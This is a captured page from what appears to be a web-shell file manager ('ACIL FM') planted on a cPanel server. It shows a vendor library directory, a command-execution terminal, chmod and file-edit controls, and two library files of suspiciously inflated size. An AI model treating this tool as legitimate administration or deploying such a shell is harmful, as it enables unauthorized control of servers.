ACIL FM
Dark
Refresh
Current DIR:
/opt/cpanel/ea-wappspector/vendor/rector/rector/vendor/nette/utils/src
/
opt
cpanel
ea-wappspector
vendor
rector
rector
vendor
nette
utils
src
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
Iterators
-
chmod
Open
Rename
Delete
Utils
-
chmod
Open
Rename
Delete
compatibility.php
776 B
chmod
View
DL
Edit
Rename
Delete
exceptions.php
2.19 MB
chmod
View
DL
Edit
Rename
Delete
HtmlStringable.php
364 B
chmod
View
DL
Edit
Rename
Delete
SmartObject.php
4.26 MB
chmod
View
DL
Edit
Rename
Delete
StaticClass.php
624 B
chmod
View
DL
Edit
Rename
Delete
Translator.php
522 B
chmod
View
DL
Edit
Rename
Delete
Edit file: /opt/cpanel/ea-wappspector/vendor/rector/rector/vendor/nette/utils/src/compatibility.php
<?php /** * This file is part of the Nette Framework (https://nette.org) * Copyright (c) 2004 David Grudl (https://davidgrudl.com) */ declare (strict_types=1); namespace RectorPrefix202411\Nette\Utils; use RectorPrefix202411\Nette; if (\false) { /** @deprecated use Nette\HtmlStringable */ interface IHtmlString extends Nette\HtmlStringable { } } elseif (!\interface_exists(IHtmlString::class)) { \class_alias(Nette\HtmlStringable::class, IHtmlString::class); } namespace RectorPrefix202411\Nette\Localization; if (\false) { /** @deprecated use Nette\Localization\Translator */ interface ITranslator extends Translator { } } elseif (!\interface_exists(ITranslator::class)) { \class_alias(Translator::class, ITranslator::class); }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply